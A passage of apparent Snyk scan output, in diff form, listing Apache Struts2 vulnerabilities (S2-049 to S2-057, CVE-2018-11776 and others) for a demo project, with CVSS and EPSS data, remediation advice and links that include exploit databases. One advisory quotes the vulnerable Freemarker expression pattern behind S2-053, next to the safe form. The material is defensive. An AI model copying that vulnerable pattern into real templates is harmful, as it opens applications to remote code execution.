In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", - "epssDetails": { - "percentile": "0.99995", - "probability": "0.97541", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9805" - ], - "CWE": [ - "CWE-20", - "CWE-502" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-06T17:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-09-05T17:28:23Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - 
"groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-06T17:28:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.345481Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Yasser Zamani" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.33)", - "[2.5,2.5.12)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.33", - "2.5.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", - "title": "GitHub Commit" - }, - { - "url": "http://struts.apache.org/docs/s2-049.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:51.213194Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:16.872773Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:51.213194Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", - "epssDetails": { - "percentile": "0.91602", - "probability": "0.03467", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9787" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-07-13T15:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:51.213194Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.33" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Adam Cazzolla", - "Jonathan Bullock" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.34)", - "[2.5,2.5.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ 
- "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", - "title": "GitHub Commit" - }, - { - "url": "http://struts.apache.org/docs/s2-050.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:48.540352Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:13.755151Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.540352Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web 
applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", - "epssDetails": { - "percentile": "0.90011", - "probability": "0.02403", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9804" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-08-23T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:48.540352Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Huijun Chen", - "Xiaolong Zhu" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.34)", - "[2.5,2.5.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - 
"malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-051.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:51.883631Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:13.751396Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:51.883631Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", - "epssDetails": { - "percentile": "0.99002", - "probability": "0.93195", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9793" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-08-23T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:51.883631Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "Lupin", - "David Greene", - "Roland McIntosh" - ], - "semver": { - "vulnerable": [ - "[,2.3.34)", - "[2.4,2.5.12)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.3.34", - "2.5.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", - "title": "Apache Security Bulletin" - }, - { - "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", - "title": "Exploit" - }, - { - "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:50.788695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:02.858095Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.788695Z" - } - ], - "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. 
Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", - "epssDetails": { - "percentile": "0.99858", - "probability": "0.97300", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-12611" - ], - "CWE": [ - "CWE-20", - "CWE-502" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-06T17:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-09-05T17:28:23Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-06T17:28:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:22.617066Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Man Yue Mo" - ], - "semver": { - "vulnerable": [ - "[2.3.0, 2.3.35)", 
- "[2.5.0, 2.5.17)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.35", - "2.5.17" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.3.0, 2.3.35)", - "[2.5.0, 2.5.17)" - ], - "functionId": { - "filePath": "com/opensymphony/xwork2/ActionChainResult.java", - "className": "ActionChainResult", - "functionName": "execute" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/45367", - "title": "Exploit DB" - }, - { - "url": "https://www.exploit-db.com/exploits/45367", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", - "title": "GitHub Commit" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", - "title": "Lgtm Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", - "title": "Struts2 Security Bulletin" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:21.641643Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:35.323655Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:21.641643Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", - "epssDetails": { - "percentile": "0.99991", - "probability": "0.97527", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11776" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2018-08-22T00:00:00Z", - 
"functions_new": [ - { - "version": [ - "[2.3.0, 2.3.35)", - "[2.5.0, 2.5.17)" - ], - "functionId": { - "className": "com.opensymphony.xwork2.ActionChainResult", - "functionName": "execute" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-08-17T00:00:00Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2018-08-22T11:53:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.324260Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.35" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", - "title": "Improper Action Name Cleanup", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.29)", - "[2.5, 2.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29", - "2.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", - "title": 
"GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:52.582114Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:23.840033Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.582114Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. 
It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", - "epssDetails": { - "percentile": "0.89903", - "probability": "0.02365", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4436" - ], - "CWE": [ - "CWE-459" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2019-07-16T11:14:42.540198Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-09-19T05:25:51Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-09-19T05:25:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.582114Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 